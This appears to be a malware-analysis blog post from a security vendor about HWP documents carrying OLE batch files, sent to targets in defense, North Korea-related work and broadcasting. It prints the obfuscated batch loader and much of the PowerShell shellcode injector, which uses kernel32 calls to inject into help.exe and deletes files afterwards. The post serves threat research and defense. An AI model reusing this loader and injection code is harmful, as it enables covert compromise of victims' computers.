Malicious HWP Files with BAT Scripts Being Distributed Actively (North Korea/National Defense/Broadcasting)

The ASEC analysis team has discovered the active distribution of APT files that are exploiting a feature of HWP files (OLE object insertion) recently. After the case introduced in the post “Malicious HWP File Disguised as Press Release of 20th Presidential Election Early Voting for Sailors Being Distributed” on March 8th, the attacker is continuously distributing malicious HWP files targeting people in the field of national defense, North Korea-related materials, and broadcasting.

When the file is opened, the OLE object (batch file) in the HWP file is run. After that, powershell injects the shellcode into a normal process. The attackers usually use texts to prompt users to click them so that OLE objects (batch files) can be executed.

The list below is the names of malicious HWP files distributed with such an operation method. The attacks targeted people in the field of national defense, North Korea-related materials, and broadcasting, and the distribution was done using PC messengers and web browsers.

• For review_Understanding Politics 6th Period(edited)_20220507.hwp (May 10th, 2022)
• Peace Asia membership request form(2022).hwp (May 11th, 2022)
• Innovation class questionnaire.hwp (May 18th, 2022)
• Analysis of Covid-19 in North Korea.hwp (May 20th, 2022)
• Peace Asia membership request form(Kim **).hwp (May 20th, 2022)
• Kim ** resume.hwp (May 20th, 2022)
• 2022 notices main parts excerpted.hwp (May 23rd, 2022)
• (Research Advisory Committee)_National Assembly Futures Institute_Research Projects_Survey.hwp (May 25th, 2022)
• 8th period_complete_Understanding Politics_Editor.hwp (May 26th, 2022)
• 220530- Innovation class questionnaire.hwp (May 30th, 2022)
• 2022 13th scholarship application form(for education).hwp (May 30th, 2022)
• Ministry of National Defense Academic Conference Order.hwp (June 2nd, 2022)
• 2022-0626 Seong-lan Ha – Who’s Crying.hwp (June 7th, 2022)

The following is an internal batch file script of 2022-0626 Seong-lan Ha – Who’s Crying.hwp found on June 7th. While the script of the batch file exists in an obfuscated form, it can still ultimately inject the shellcode into a normal Windows process using powershell.

@echo off
IF EXIST "%PROGRAMFILES(X86)%" (set pspath="%windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe") 
ELSE (set pspath="%windir%\system32\WindowsPowerShell\v1.0\powershell.exe")
start "" %pspath%  -command "$ttms="$eruk2="""2463029..omitted..3B7D7D""";
for($i=0;$i -le $eruk2.Length-2;$i=$i+2){$NTMO=$eruk2[$i]+$eruk2[$i+1];$blwp= $blwp+[char]([convert]::toint16($NTMO,16));};
Invoke-Command -ScriptBlock ([Scriptblock]::Create($blwp));";
Invoke - Command - ScriptBlock([Scriptblock]::Create($ttms));"

As the file’s variable names and operation method are the same as the one revealed on March 3rd and discussed in the post “Malicious HWP File Disguised as Press Release of 20th Presidential Election Early Voting for Sailors Being Distributed” (, it is likely that the group behind the attack is identical.

  • Identical variable names for the powershell used: $ttms$eruk2
  • Comparison of powershell commands (similarity in codes)
    -> March 3rd: $kkx9=[DllImport(“user32.dll”)] public static extern bool ShowWindow(int handle, int state);
    -> June 7th: $kkp8=@” [DllImport(“user32.dll”)] public static extern bool ShowWindow(IntPtr a, uint b);”@;

The following is the final powershell code for decryption. It reads the shellcode at the bottom part of the HWP file to perform an injection to a normal Windows process (help.exe).

public static extern bool ShowWindow(IntPtr a, uint b);
$mmp8=Add-Type -MemberDefinition $kkp8 -Name "AAA"  -PassThru;
$mmp8::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
    public IntPtr hP;
    public IntPtr ht;
    public uint dwProcessId;
    public uint dwThreadId;
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct STARTUPINFO
    public uint cb;
    public string lpReserved;
    public string lpDesktop;
    public string lpTitle;
    public uint dwX;
    public uint dwY;
    public uint dwXSize;
    public uint dwYSize;
    public uint dwXCountChars;
    public uint dwYCountChars;
    public uint dwFillAttribute;
    public uint dwFlags;
    public uint wShowWindow;
    public short cbReserved2;
    public IntPtr lpReserved2;
    public IntPtr hStdInput;
    public IntPtr hStdOutput;
    public IntPtr hStdError;
public static class Kernel32
    public static extern bool CreateProcess(string a,string b,uint c,uint d,bool e,uint f,IntPtr g,string h, ref STARTUPINFO i,out PROCESS_INFORMATION j);
    public static extern IntPtr GlobalAlloc(uint a,uint b);
    public static extern IntPtr VirtualAllocEx(IntPtr a,IntPtr b, uint c,uint d, uint  e);
    public static extern bool WriteProcessMemory(IntPtr a,IntPtr b,IntPtr c,uint  d,IntPtr e);
    public static extern IntPtr WaitForSingleObject(IntPtr a,uint b);
    public static extern IntPtr CreateRemoteThread(IntPtr a,IntPtr b,uint c,IntPtr d,IntPtr e,uint f,IntPtr g);
$si = New-Object STARTUPINFO;
$ap8=Get-WmiObject Win32_Process -filter "Name like 'Hwp%'";
while(1){if($y -eq 1){break;}if($ap8.GetType().Name -eq "Object[]"){if($x -eq $ap8.count){$y=1;}$bp8=$ap8[$x].Name;
$y=1;}$ep8=$cp8.Split('"').count;if($ep8 -eq 3){$fp8=$cp8.Split('"')[2].Split(' ')[1];}elseif($ep8 -eq 5){$fp8=$cp8.Split('"')[3];}$bytes = Get-Content $fp8 -Tail 1 -Encoding Byte;
$dp8="/c taskkill /f /im "+$bp8;cmd $dp8;if($bytes -eq 0x88){$gp8=""""+$env:TEMP+"\alw0305k.con"+"""";
$ip8=""""+$fp8+"""";<strong>sleep</strong> 3;
$bytes = Get-Content $fp8 -Tail 0x332 -Encoding Byte;
$addr = [Kernel32]::GlobalAlloc(0x40, 0x400);
for ($h = 0;$h -lt 0x331;$h++)
{[System.Runtime.InteropServices.Marshal]::WriteByte($addr, $h, $bytes[$h]);};
[Kernel32]::CreateProcess("c:\windows\SysWOW64\help.exe",0,0,0,0,0x04,0,"c:",[ref] $si,[ref] $pi);
$mp8=[Kernel32]::VirtualAllocEx($kp8,0,0x400,0x1000,0x40);[Kernel32]::WriteProcessMemory($kp8,$mp8,$addr, 0x331, 0);
$dp8="/c copy /y "+$gp8+" "+$ip8;
$psp8=cmd $dp8;<strong>sleep</strong> 1;if($pep8 -eq 5){break;}}while($psp8.Trim()[0] -ne '1');start $ip8;
$jp8="cmd /c del /f "+""""+$gp8+"""";cmd $jp8;
$jp8="cmd /c del /f "+""""+$hp8+"""";cmd $jp8;
$lp8 = [Kernel32]::CreateRemoteThread($kp8, 0, 0, $mp8, 0, 0, 0);[Kernel32]::WaitForSingleObject($lp8, 500*1000);}}

For malicious HWP files, APT files were usually distributed in the past using the Post Script vulnerability. However, recent distribution cases use a feature of the HWP file. Whereas the vulnerability runs the malicious shellcode on its own, the method using the OLE object performs malicious behaviors by involving the user (clicking).

Figure 1. The feature of inserting OLE objects in Hancom 2020

After February 2017, Hancom Office officially distributed a security update for the Post Script vulnerability and removed the feature to insert and view EPS files. Due to such an update, it appears that the attacker exploited OLE objects to distribute malicious files so that the malicious behaviors can be executed even for users with the latest version of Hancom Office.

So far, there have been cases of malicious HWP files downloaded from web browsers or distributed through PC messengers. Users should refrain from opening attachments from posts from unknown sources and take extreme caution not to download and view files sent by an unknown user through a PC messenger.

[File Detection]


Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

Tagged as:,

5 2 votes
Article Rating
Inline Feedbacks
View all comments